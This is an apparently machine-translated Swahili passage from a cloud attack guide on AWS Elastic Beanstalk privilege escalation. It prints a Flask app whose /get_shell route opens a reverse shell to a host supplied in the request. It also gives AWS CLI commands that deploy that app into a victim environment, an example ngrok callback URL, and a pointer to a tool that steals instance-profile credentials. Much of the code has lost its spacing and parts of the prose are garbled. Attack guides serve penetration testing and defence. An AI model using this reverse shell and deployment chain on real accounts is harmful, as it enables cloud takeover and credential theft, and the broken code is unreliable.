Ili kufanya vitendo nyeti katika Beanstalk unahitaji kuwa na idhini nyingi nyeti katika huduma nyingi tofauti. Unaweza kuangalia kwa mfano idhini zilizotolewa kwa arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk
elasticbeanstalk:RebuildEnvironment, S3 write permissions & many others
Kwa idhini za kuandika juu ya S3 bucket inayoshikilia kod ya mazingira na idhini za kujenga upya programu (inahitajika elasticbeanstalk:RebuildEnvironment na nyingine chache zinazohusiana na S3, EC2 na Cloudformation), unaweza kubadilishakod, kujenga upya programu na wakati ujao unapoingia kwenye programu it itekeleze kod yako mpya, ikiruhusu mshambuliaji kuathiri programu na akreditivu za IAM role zake.
elasticbeanstalk:CreateApplication, elasticbeanstalk:CreateEnvironment, elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, iam:PassRole, na mengineyo...
Ruhusa zilizotajwa pamoja na kadhaa S3, EC2, cloudformation, autoscaling na elasticloadbalancing ni muhimu ili kuunda hali ya msingi ya Elastic Beanstalk kutoka mwanzo.
Kwanza kabisa unahitaji kuunda mazingira halali ya Beanstalk na msimbo unayotaka kuendesha katika mhasiriwa kufuata hatua za awali. Inaweza kuwa zip rahisi inayojumuisha faili hizi 2:
from flask import Flask, request, jsonifyimport subprocess,os, socketapplication =Flask(__name__)@application.errorhandler(404)defpage_not_found(e):returnjsonify('404')@application.route("/")defindex():returnjsonify('Welcome!')@application.route("/get_shell")defsearch():host=request.args.get('host')port=request.args.get('port')if host and port:s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect((host,int(port)))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(["/bin/sh","-i"])returnjsonify('done')if__name__=="__main__":application.run()
Mara tu una mazingira yako ya Beanstalk inayoendesha shell yako ya rev, ni wakati wa kuhamasisha kwa mazingira ya waathiriwa. Ili kufanya hivyo unahitaji kusaidia Sera ya Bucket ya bucket yako ya beanstalk S3 ili mwaathiriwa aweze kuipata (Kumbuka kwamba hii itafungua Bucket kwa KILA MTU):
# Use a new --version-label# Use the bucket from your own accountawselasticbeanstalkcreate-application-version--application-nameMyApp--version-labelMyApp-2.0--source-bundleS3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="revshell.zip"# These step needs the extra permissionsawselasticbeanstalkupdate-environment--environment-nameMyEnv--version-labelMyApp-1.0# To get your rev shell just access the exposed web URL with params such as:http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance).
ThedeveloperhasintentionstoestablishareverseshellusingNetcatorSocatwithnextstepstokeepexploitationcontainedtotheec2instancetoavoiddetections.
